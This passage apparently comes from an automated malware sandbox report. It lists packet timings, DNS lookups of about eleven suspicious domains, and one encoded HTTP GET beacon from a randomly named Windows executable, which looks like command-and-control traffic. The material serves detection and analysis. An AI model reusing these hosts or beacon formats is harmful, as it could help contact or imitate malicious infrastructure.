                                                                                                            Jan 11, 2025 04:26:48.757055998 CET805001477.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:26:48.757174969 CET5001480192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:49.681694031 CET5001480192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:50.701225996 CET5001580192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:50.706161022 CET805001577.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:26:50.706291914 CET5001580192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:50.723418951 CET5001580192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:50.728262901 CET805001577.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:26:51.299280882 CET805001577.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:26:51.299370050 CET805001577.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:26:51.299442053 CET5001580192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:52.232302904 CET5001580192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:53.248505116 CET5001680192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:53.253459930 CET805001677.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:26:53.253563881 CET5001680192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:53.271564007 CET5001680192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:53.276498079 CET805001677.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:26:53.276628971 CET805001677.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:26:53.846975088 CET805001677.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:26:53.847088099 CET805001677.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:26:53.847158909 CET5001680192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:54.775410891 CET5001680192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:55.794064045 CET5001780192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:55.799305916 CET805001777.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:26:55.799438000 CET5001780192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:55.811008930 CET5001780192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:55.816035986 CET805001777.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:26:56.407304049 CET805001777.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:26:56.407331944 CET805001777.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:26:56.407541990 CET5001780192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:56.418941975 CET5001780192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:56.423723936 CET805001777.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:27:01.666709900 CET5001880192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:01.671679974 CET8050018208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:01.671866894 CET5001880192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:01.692235947 CET5001880192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:01.697084904 CET8050018208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:02.189126015 CET8050018208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:02.189456940 CET5001880192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:03.197349072 CET5001880192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:03.202236891 CET8050018208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:04.216216087 CET5001980192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:04.221265078 CET8050019208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:04.221389055 CET5001980192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:04.236709118 CET5001980192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:04.241574049 CET8050019208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:04.768742085 CET8050019208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:04.768879890 CET5001980192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:05.744591951 CET5001980192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:05.749490023 CET8050019208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:06.763082027 CET5002080192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:06.767991066 CET8050020208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:06.768085957 CET5002080192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:06.783391953 CET5002080192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:06.788404942 CET8050020208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:06.788533926 CET8050020208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:07.295887947 CET8050020208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:07.295998096 CET5002080192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:08.291249037 CET5002080192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:08.296147108 CET8050020208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:09.310276985 CET5002180192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:09.315068960 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:09.315207958 CET5002180192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:09.325422049 CET5002180192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:09.330223083 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:10.240576029 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:10.240612030 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:10.240628958 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:10.240777016 CET5002180192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:10.240896940 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:10.240912914 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:10.241064072 CET5002180192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:10.241202116 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:10.241218090 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:10.241235018 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:10.241250992 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:10.241278887 CET5002180192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:10.241278887 CET5002180192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:10.241563082 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:10.241842985 CET5002180192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:10.245713949 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:10.245769978 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:10.245784998 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:10.245858908 CET5002180192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:10.245920897 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:10.246040106 CET5002180192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:10.333070993 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:10.333086967 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:10.333098888 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:10.333338976 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:10.333348989 CET5002180192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:10.333350897 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:10.333364010 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:10.333580017 CET5002180192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:10.333717108 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:10.333854914 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:10.333864927 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:10.333966017 CET5002180192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:10.334089041 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:10.334100962 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:10.334112883 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:10.334124088 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:10.334178925 CET5002180192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:10.334178925 CET5002180192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:10.334649086 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:10.334800959 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:10.334813118 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:10.334870100 CET5002180192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:10.334870100 CET5002180192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:10.335035086 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:10.335083008 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:10.335221052 CET5002180192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:10.337760925 CET5002180192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:10.342497110 CET8050021208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:15.546848059 CET5002280192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:27:15.551743031 CET805002284.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:27:15.551834106 CET5002280192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:27:15.567838907 CET5002280192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:27:15.572607994 CET805002284.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:27:16.005877018 CET805002284.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:27:16.005945921 CET5002280192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:27:17.072367907 CET5002280192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:27:17.077265024 CET805002284.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:27:18.091166973 CET5002380192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:27:18.095993996 CET805002384.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:27:18.096103907 CET5002380192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:27:18.111947060 CET5002380192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:27:18.116743088 CET805002384.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:27:18.571566105 CET805002384.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:27:18.571707964 CET5002380192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:27:19.622759104 CET5002380192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:27:19.627705097 CET805002384.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:27:20.637937069 CET5002480192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:27:20.643029928 CET805002484.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:27:20.643126965 CET5002480192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:27:20.658957005 CET5002480192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:27:20.663938046 CET805002484.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:27:20.663957119 CET805002484.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:27:21.119890928 CET805002484.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:27:21.119975090 CET5002480192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:27:22.180080891 CET5002480192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:27:22.185046911 CET805002484.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:27:23.184741974 CET5002580192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:27:23.189815044 CET805002584.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:27:23.189920902 CET5002580192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:27:23.198107958 CET5002580192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:27:23.202876091 CET805002584.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:27:23.657279968 CET805002584.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:27:23.657371044 CET805002584.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:27:23.657381058 CET805002584.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:27:23.657404900 CET5002580192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:27:23.657687902 CET805002584.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:27:23.657697916 CET805002584.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:27:23.657707930 CET805002584.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:27:23.657720089 CET5002580192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:27:23.657790899 CET5002580192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:27:23.658134937 CET805002584.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:27:23.658144951 CET805002584.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:27:23.658150911 CET805002584.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:27:23.658162117 CET805002584.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:27:23.658206940 CET5002580192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:27:23.661613941 CET5002580192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:27:23.666835070 CET805002584.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:27:28.703099966 CET5002680192.168.2.6104.21.32.1
                                                                                                            Jan 11, 2025 04:27:28.708000898 CET8050026104.21.32.1192.168.2.6
                                                                                                            Jan 11, 2025 04:27:28.708147049 CET5002680192.168.2.6104.21.32.1
                                                                                                            Jan 11, 2025 04:27:28.723066092 CET5002680192.168.2.6104.21.32.1
                                                                                                            Jan 11, 2025 04:27:28.727881908 CET8050026104.21.32.1192.168.2.6
                                                                                                            Jan 11, 2025 04:27:29.362637043 CET8050026104.21.32.1192.168.2.6
                                                                                                            Jan 11, 2025 04:27:29.362668991 CET8050026104.21.32.1192.168.2.6
                                                                                                            Jan 11, 2025 04:27:29.362683058 CET8050026104.21.32.1192.168.2.6
                                                                                                            Jan 11, 2025 04:27:29.362740993 CET5002680192.168.2.6104.21.32.1
                                                                                                            Jan 11, 2025 04:27:29.363408089 CET8050026104.21.32.1192.168.2.6
                                                                                                            Jan 11, 2025 04:27:29.363526106 CET5002680192.168.2.6104.21.32.1
                                                                                                            Jan 11, 2025 04:27:30.228909016 CET5002680192.168.2.6104.21.32.1
                                                                                                            Jan 11, 2025 04:27:31.249089003 CET5002780192.168.2.6104.21.32.1
                                                                                                            Jan 11, 2025 04:27:31.254229069 CET8050027104.21.32.1192.168.2.6
                                                                                                            Jan 11, 2025 04:27:31.254337072 CET5002780192.168.2.6104.21.32.1
                                                                                                            Jan 11, 2025 04:27:31.271197081 CET5002780192.168.2.6104.21.32.1
                                                                                                            Jan 11, 2025 04:27:31.276112080 CET8050027104.21.32.1192.168.2.6
                                                                                                            Jan 11, 2025 04:27:31.902353048 CET8050027104.21.32.1192.168.2.6
                                                                                                            Jan 11, 2025 04:27:31.902371883 CET8050027104.21.32.1192.168.2.6
                                                                                                            Jan 11, 2025 04:27:31.902457952 CET5002780192.168.2.6104.21.32.1
                                                                                                            Jan 11, 2025 04:27:31.902693033 CET8050027104.21.32.1192.168.2.6
                                                                                                            Jan 11, 2025 04:27:31.902743101 CET5002780192.168.2.6104.21.32.1
                                                                                                            Jan 11, 2025 04:27:32.775713921 CET5002780192.168.2.6104.21.32.1
                                                                                                            Jan 11, 2025 04:27:34.356882095 CET5002880192.168.2.6104.21.32.1
                                                                                                            Jan 11, 2025 04:27:34.361818075 CET8050028104.21.32.1192.168.2.6
                                                                                                            Jan 11, 2025 04:27:34.361920118 CET5002880192.168.2.6104.21.32.1
                                                                                                            Jan 11, 2025 04:27:34.380592108 CET5002880192.168.2.6104.21.32.1
                                                                                                            Jan 11, 2025 04:27:34.385566950 CET8050028104.21.32.1192.168.2.6
                                                                                                            Jan 11, 2025 04:27:34.386943102 CET8050028104.21.32.1192.168.2.6
                                                                                                            Jan 11, 2025 04:27:34.991112947 CET8050028104.21.32.1192.168.2.6
                                                                                                            Jan 11, 2025 04:27:34.991226912 CET8050028104.21.32.1192.168.2.6
                                                                                                            Jan 11, 2025 04:27:34.991328955 CET5002880192.168.2.6104.21.32.1
                                                                                                            Jan 11, 2025 04:27:34.991353035 CET8050028104.21.32.1192.168.2.6
                                                                                                            Jan 11, 2025 04:27:34.991410017 CET5002880192.168.2.6104.21.32.1

                                                                                                            UDP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Jan 11, 2025 04:25:14.538187981 CET5892853192.168.2.61.1.1.1
                                                                                                            Jan 11, 2025 04:25:14.890705109 CET53589281.1.1.1192.168.2.6
                                                                                                            Jan 11, 2025 04:25:30.826420069 CET5755553192.168.2.61.1.1.1
                                                                                                            Jan 11, 2025 04:25:31.297951937 CET53575551.1.1.1192.168.2.6
                                                                                                            Jan 11, 2025 04:25:45.078175068 CET5999253192.168.2.61.1.1.1
                                                                                                            Jan 11, 2025 04:25:45.216362000 CET53599921.1.1.1192.168.2.6
                                                                                                            Jan 11, 2025 04:25:58.545001984 CET6275353192.168.2.61.1.1.1
                                                                                                            Jan 11, 2025 04:25:58.650691032 CET53627531.1.1.1192.168.2.6
                                                                                                            Jan 11, 2025 04:26:06.716489077 CET5179853192.168.2.61.1.1.1
                                                                                                            Jan 11, 2025 04:26:06.754842997 CET53517981.1.1.1192.168.2.6
                                                                                                            Jan 11, 2025 04:26:20.169841051 CET4999453192.168.2.61.1.1.1
                                                                                                            Jan 11, 2025 04:26:20.215799093 CET53499941.1.1.1192.168.2.6
                                                                                                            Jan 11, 2025 04:26:33.341933012 CET6224553192.168.2.61.1.1.1
                                                                                                            Jan 11, 2025 04:26:33.999340057 CET53622451.1.1.1192.168.2.6
                                                                                                            Jan 11, 2025 04:26:48.109494925 CET5256853192.168.2.61.1.1.1
                                                                                                            Jan 11, 2025 04:26:48.142772913 CET53525681.1.1.1192.168.2.6
                                                                                                            Jan 11, 2025 04:27:01.441307068 CET6231553192.168.2.61.1.1.1
                                                                                                            Jan 11, 2025 04:27:01.663593054 CET53623151.1.1.1192.168.2.6
                                                                                                            Jan 11, 2025 04:27:15.342020988 CET5552953192.168.2.61.1.1.1
                                                                                                            Jan 11, 2025 04:27:15.544190884 CET53555291.1.1.1192.168.2.6
                                                                                                            Jan 11, 2025 04:27:28.670289993 CET5579853192.168.2.61.1.1.1
                                                                                                            Jan 11, 2025 04:27:28.700617075 CET53557981.1.1.1192.168.2.6

                                                                                                            DNS Queries

                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Jan 11, 2025 04:25:14.538187981 CET192.168.2.61.1.1.10x16cfStandard query (0)www.7261ltajbc.bondA (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:25:30.826420069 CET192.168.2.61.1.1.10x501bStandard query (0)www.muasamgiare.clickA (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:25:45.078175068 CET192.168.2.61.1.1.10xc3a2Standard query (0)www.kkpmoneysocial.topA (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:25:58.545001984 CET192.168.2.61.1.1.10xc065Standard query (0)www.artkub.netA (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:26:06.716489077 CET192.168.2.61.1.1.10x4b96Standard query (0)www.happyjam.lifeA (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:26:20.169841051 CET192.168.2.61.1.1.10xfebStandard query (0)www.123hellodrive.shopA (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:26:33.341933012 CET192.168.2.61.1.1.10xc37fStandard query (0)www.zoomlive.liveA (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:26:48.109494925 CET192.168.2.61.1.1.10x1eebStandard query (0)www.dietcoffee.onlineA (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:27:01.441307068 CET192.168.2.61.1.1.10x2e22Standard query (0)www.guacamask.onlineA (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:27:15.342020988 CET192.168.2.61.1.1.10xef23Standard query (0)www.appsolucao.shopA (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:27:28.670289993 CET192.168.2.61.1.1.10xf620Standard query (0)www.aziziyeescortg.xyzA (IP address)IN (0x0001)false

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Jan 11, 2025 04:25:14.890705109 CET1.1.1.1192.168.2.60x16cfNo error (0)www.7261ltajbc.bond154.12.28.184A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:25:31.297951937 CET1.1.1.1192.168.2.60x501bNo error (0)www.muasamgiare.clickdns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:25:31.297951937 CET1.1.1.1192.168.2.60x501bNo error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:25:31.297951937 CET1.1.1.1192.168.2.60x501bNo error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:25:45.216362000 CET1.1.1.1192.168.2.60xc3a2No error (0)www.kkpmoneysocial.top104.21.112.1A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:25:45.216362000 CET1.1.1.1192.168.2.60xc3a2No error (0)www.kkpmoneysocial.top104.21.64.1A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:25:45.216362000 CET1.1.1.1192.168.2.60xc3a2No error (0)www.kkpmoneysocial.top104.21.32.1A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:25:45.216362000 CET1.1.1.1192.168.2.60xc3a2No error (0)www.kkpmoneysocial.top104.21.96.1A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:25:45.216362000 CET1.1.1.1192.168.2.60xc3a2No error (0)www.kkpmoneysocial.top104.21.16.1A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:25:45.216362000 CET1.1.1.1192.168.2.60xc3a2No error (0)www.kkpmoneysocial.top104.21.48.1A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:25:45.216362000 CET1.1.1.1192.168.2.60xc3a2No error (0)www.kkpmoneysocial.top104.21.80.1A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:26:06.754842997 CET1.1.1.1192.168.2.60x4b96No error (0)www.happyjam.life209.74.77.107A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:26:20.215799093 CET1.1.1.1192.168.2.60xfebNo error (0)www.123hellodrive.shop123hellodrive.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:26:20.215799093 CET1.1.1.1192.168.2.60xfebNo error (0)123hellodrive.shop84.32.84.32A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:26:33.999340057 CET1.1.1.1192.168.2.60xc37fNo error (0)www.zoomlive.live154.208.202.225A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:26:48.142772913 CET1.1.1.1192.168.2.60x1eebNo error (0)www.dietcoffee.online77.68.64.45A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:27:01.663593054 CET1.1.1.1192.168.2.60x2e22No error (0)www.guacamask.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:27:15.544190884 CET1.1.1.1192.168.2.60xef23No error (0)www.appsolucao.shopappsolucao.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:27:15.544190884 CET1.1.1.1192.168.2.60xef23No error (0)appsolucao.shop84.32.84.32A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:27:28.700617075 CET1.1.1.1192.168.2.60xf620No error (0)www.aziziyeescortg.xyz104.21.32.1A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:27:28.700617075 CET1.1.1.1192.168.2.60xf620No error (0)www.aziziyeescortg.xyz104.21.96.1A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:27:28.700617075 CET1.1.1.1192.168.2.60xf620No error (0)www.aziziyeescortg.xyz104.21.112.1A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:27:28.700617075 CET1.1.1.1192.168.2.60xf620No error (0)www.aziziyeescortg.xyz104.21.80.1A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:27:28.700617075 CET1.1.1.1192.168.2.60xf620No error (0)www.aziziyeescortg.xyz104.21.64.1A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:27:28.700617075 CET1.1.1.1192.168.2.60xf620No error (0)www.aziziyeescortg.xyz104.21.16.1A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 04:27:28.700617075 CET1.1.1.1192.168.2.60xf620No error (0)www.aziziyeescortg.xyz104.21.48.1A (IP address)IN (0x0001)false

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • www.7261ltajbc.bond
                                                                                                            • www.muasamgiare.click
                                                                                                            • www.kkpmoneysocial.top
                                                                                                            • www.happyjam.life
                                                                                                            • www.123hellodrive.shop
                                                                                                            • www.zoomlive.live
                                                                                                            • www.dietcoffee.online
                                                                                                            • www.guacamask.online
                                                                                                            • www.appsolucao.shop
                                                                                                            • www.aziziyeescortg.xyz

                                                                                                            HTTP Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.649987154.12.28.184801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:25:14.926553965 CET487OUTGET /vt4e/?I8A=fF8h_X3X0TB&9PZt=VWo59DE7z/zpNvlQrGwQqnlKKikmhHzFU/awM9upW87Yx15oShf3plLjnAS2lxJKaRtg2RYIywQ4d8OifO+Rpmij5Ffq0kXSJKVYpR6npO/nbInFwrm8n/2iwd1ApVHfxnTP7ZY= HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.7261ltajbc.bond
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Jan 11, 2025 04:25:15.778045893 CET691INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Sat, 11 Jan 2025 03:25:15 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 548
                                                                                                            Connection: close
